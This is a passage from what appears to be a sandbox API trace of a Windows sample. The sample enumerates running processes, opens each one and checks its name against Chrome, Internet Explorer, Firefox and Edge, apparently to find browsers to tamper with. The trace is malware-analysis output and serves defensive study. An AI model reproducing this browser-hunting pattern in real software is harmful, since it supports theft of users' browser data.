	[0228.300] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.301] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.301] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.301] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.301] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.302] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6374
	[0228.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.302] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.303] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.303] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.303] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.304] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.304] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x6378
	[0228.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.304] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.305] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.305] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.306] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.306] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0228.314] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x637c
	[0228.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.314] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0228.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.314] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.315] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0228.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.315] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.315] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.316] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6380
	[0228.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.316] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.317] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.317] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.317] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.318] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0228.318] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6384
	[0228.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.319] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.319] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.319] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.320] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.320] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0228.321] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x6388
	[0228.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.321] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0228.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.321] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.322] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0228.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.322] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.322] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.323] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x638c
	[0228.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.323] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.323] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.324] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.324] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.324] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0228.325] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6390
	[0228.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.325] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0228.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.326] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.326] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0228.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.326] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.327] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0228.328] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x6394
	[0228.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.328] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0228.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.328] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.328] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0228.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.329] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.329] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0228.330] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x6398
	[0228.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.330] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0228.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.330] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.331] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0228.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.331] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.331] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0228.332] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x639c
	[0228.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.332] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0228.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.332] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.333] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0228.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.333] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.333] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0228.334] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0228.334] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0228.335] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x63a0
	[0228.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.336] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0228.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.336] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.337] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0228.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.337] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.338] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0228.339] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x63a4
	[0228.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.339] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0228.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.339] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.340] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0228.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.340] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.340] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0228.341] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x63a8
	[0228.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.341] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0228.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.341] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.342] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0228.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.342] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.342] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0228.343] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x63ac
	[0228.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.343] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0228.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.344] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.344] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0228.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.344] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.345] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0228.345] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x63b0
	[0228.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.346] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0228.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.346] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.347] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0228.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.347] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.348] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0228.348] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x63b4
	[0228.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.349] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0228.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.349] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.349] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0228.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.350] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.350] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0228.350] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x63b8
	[0228.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.351] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0228.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.351] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.352] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0228.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.352] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.352] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0228.353] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x63bc
	[0228.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.354] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0228.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.354] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.355] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0228.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.355] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.356] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0228.356] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x63c0
	[0228.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.357] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0228.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.357] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.357] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0228.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.357] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.358] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0228.358] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x63c4
	[0228.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.358] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0228.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.359] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.359] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0228.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.359] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.360] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0228.360] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x63c8
	[0228.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.360] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0228.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.361] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.361] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0228.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.362] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.362] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0228.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x63cc
	[0228.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.363] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0228.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.364] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.364] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0228.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.365] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.366] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0228.366] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x63d0
	[0228.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.366] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0228.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.367] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
